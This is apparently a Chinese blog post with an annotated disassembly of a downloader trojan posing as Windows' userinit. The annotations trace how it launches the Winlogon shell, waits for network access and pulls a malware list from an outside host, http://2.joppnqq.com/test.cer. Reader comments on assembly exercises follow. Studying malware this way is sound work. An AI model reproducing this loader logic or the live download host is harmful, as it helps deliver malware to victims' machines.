CODE:
0040045A > $ 55 push ebp ; (初始 cpu 选择)
0040045B . 8BEC mov ebp,esp
0040045D . 81C4 E8FEFFFF add esp,-118
00400463 . 68 9C0A4000 push userinit.00400A9C ; /user32.dll
00400468 . E8 55020000 call <jmp.&kernel32.LoadLibraryA> ; \LoadLibraryA
0040046D . 0BC0 or eax,eax
0040046F . 74 11 je short userinit.00400482
00400471 . 68 A70A4000 push userinit.00400AA7 ; /loadremotefonts
00400476 . 50 push eax ; |hModule
00400477 . E8 34020000 call <jmp.&kernel32.GetProcAddress> ; \GetProcAddress
0040047C . 0BC0 or eax,eax
0040047E . 74 02 je short userinit.00400482
00400480 . FFD0 call eax ; USER32.LoadRemoteFonts
00400482 > 8D45 FC lea eax,dword ptr ss:[ebp-4]
00400485 . 50 push eax ; /pHandle
00400486 . 68 19000200 push 20019 ; |Access = KEY_READ
0040048B . 6A 00 push 0 ; |Reserved = 0
0040048D . 68 B70A4000 push userinit.00400AB7 ; |software\microsoft\windows nt\currentversion\winlogon
00400492 . 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00400497 . E8 5C020000 call <jmp.&advapi32.RegOpenKeyExA> ; \RegOpenKeyExA
0040049C . 0BC0 or eax,eax //打开注册表检测winlogon键值
0040049E . 75 48 jnz short userinit.004004E8
004004A0 . C745 F8 04010000 mov dword ptr ss:[ebp-8],104
004004A7 . 68 04010000 push 104 ; /Length = 104 (260.)
004004AC . 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10C] ; |
004004B2 . 50 push eax ; |Destination
004004B3 . E8 16020000 call <jmp.&kernel32.RtlZeroMemory> ; \RtlZeroMemory
004004B8 . 8D45 F8 lea eax,dword ptr ss:[ebp-8]
004004BB . 50 push eax ; /pBufSize
004004BC . 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10C] ; |
004004C2 . 50 push eax ; |Buffer
004004C3 . 6A 00 push 0 ; |pValueType = NULL
004004C5 . 6A 00 push 0 ; |Reserved = NULL
004004C7 . 68 960A4000 push userinit.00400A96 ; |shell
004004CC . FF75 FC push dword ptr ss:[ebp-4] ; |hKey
004004CF . E8 2A020000 call <jmp.&advapi32.RegQueryValueExA> ; \RegQueryValueExA
004004D4 . 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10C]
004004DA . 50 push eax ; /Arg1
004004DB . E8 50FDFFFF call userinit.00400230 ; \userinit.00400230 CreateProcessA
004004E0 . FF75 FC push dword ptr ss:[ebp-4] ; /hKey
004004E3 . E8 0A020000 call <jmp.&advapi32.RegCloseKey> ; \RegCloseKey
004004E8 > 68 E8030000 push 3E8 ; /Timeout = 1000. ms
004004ED . E8 E8010000 call <jmp.&kernel32.Sleep> ; \Sleep
004004F2 . 6A 00 push 0
004004F4 . 8D45 F8 lea eax,dword ptr ss:[ebp-8]
004004F7 . 50 push eax
004004F8 . E8 13020000 call <jmp.&wininet.InternetGetConnectedState> ;看网络是否连接
004004FD . 0BC0 or eax,eax
004004FF . 75 02 jnz short userinit.00400503
00400501 .^ EB E5 jmp short userinit.004004E8
00400503 > 68 04010000 push 104 ; /Length = 104 (260.)
00400508 . 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10C] ; |
0040050E . 50 push eax ; |Destination
0040050F . E8 BA010000 call <jmp.&kernel32.RtlZeroMemory> ; \RtlZeroMemory
00400514 . 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10C]
0040051A . 50 push eax ; /TempName
0040051B . 6A 00 push 0 ; |Unique = 0
0040051D . 6A 00 push 0 ; |Prefix = NULL
0040051F . 68 940A4000 push userinit.00400A94 ; |.
00400524 . E8 93010000 call <jmp.&kernel32.GetTempFileNameA> ; \GetTempFileNameA ;生成下载病毒列表得文件名
00400529 > 68 E8030000 push 3E8 ; /Timeout = 1000. ms
0040052E . E8 A7010000 call <jmp.&kernel32.Sleep> ; \Sleep
00400533 . 68 88130000 push 1388 ; /Arg3 = 00001388
00400538 . 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10C] ; |
0040053E . 50 push eax ; |Arg2
0040053F . 68 ED0A4000 push userinit.00400AED ; |http://2.joppnqq.com/test.cer ;病毒列表
00400544 . E8 2CFDFFFF call userinit.00400275 ; \userinit.00400275 ;里面事下载并读取病毒列表下载病毒~
00400549 . 0BC0 or eax,eax
0040054B . 0F84 17010000 je userinit.00400668
00400551 . C705 900A4000 00000000 mov dword ptr ds:[400A90],0
0040055B . 6A 00 push 0 ; /hTemplateFile = NULL
0040055D . 6A 00 push 0 ; |Attributes = 0
0040055F . 6A 03 push 3 ; |Mode = OPEN_EXISTING
00400561 . 6A 00 push 0 ; |pSecurity = NULL
00400563 . 6A 00 push 0 ; |ShareMode = 0
00400565 . 68 00000080 push 80000000 ; |Access = GENERIC_READ
0040056A . 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10C] ; |
00400570 . 50 push eax ; |FileName
00400571 . E8 16010000 call <jmp.&kernel32.CreateFileA> ; \CreateFileA
00400576 . 83F8 FF cmp eax,-1
00400579 . 0F84 E2000000 je userinit.00400661
0040057F . 8985 F0FEFFFF mov dword ptr ss:[ebp-110],eax
00400585 . 6A 00 push 0 ; /pFileSizeHigh = NULL
00400587 . FFB5 F0FEFFFF push dword ptr ss:[ebp-110] ; |hFile
0040058D . E8 18010000 call <jmp.&kernel32.GetFileSize> ; \GetFileSize
00400592 . 83F8 0F cmp eax,0F
00400595 . 73 0D jnb short userinit.004005A4
00400597 . FFB5 F0FEFFFF push dword ptr ss:[ebp-110] ; /hObject
0040059D . E8 E4000000 call <jmp.&kernel32.CloseHandle> ; \CloseHandle
......................................................................................................................
00400676 . 6A 64 push 64 ; /Timeout = 100. ms
00400678 . E8 5D000000 call <jmp.&kernel32.Sleep> ; \Sleep
0040067D .^ EB EE jmp short userinit.0040066D
0040067F > 6A 00 push 0 ; /ExitCode = 0
00400681 . E8 1E000000 call <jmp.&kernel32.ExitProcess> ; \ExitProcess
等学好了汇编我再来看.这个先放在这里,到时候我相信肯定收获不小,嘿嘿
- [anwu00] 写反了,最小为1001H,最大为2000H 05/10 11:04
- [crazyman] 博主确实好久不见了。 这里是一个开始,希望更多人都能从这里明确方向,开始自己的计算机之路。 08/16 14:55
- [游客] 你那个循环3FH错了 应该是循环40H 因为是添入0-63 就是添64次 08/02 17:27
- [游客] 我猜是因为2000:0000这段是给当成了一段栈寄存器使用了 所以一些数据会往里写入 写入的数据有的 07/29 23:00
- [游客] 2^N=寻址能力 N是总线宽度 算出的能力是B为单位 比如宽度13的CPU 2^13=8192 07/29 22:56
- [游客] 恩,有道理 04/08 12:25
- [atel] 那主程序我测试过的,可以显示的.但是加载到了软盘就不行了. 04/06 22:36
- [wdm] 没有错误啊。 我试了,运行ok的! 04/06 18:17
- [wdm] 说明程序还是有问题哟。 建议你一点一点的来做,先做一显示功能选项的界面吧。 然后在一点点的进行功 04/06 18:10
- [atel] 有什么错误? 04/04 21:33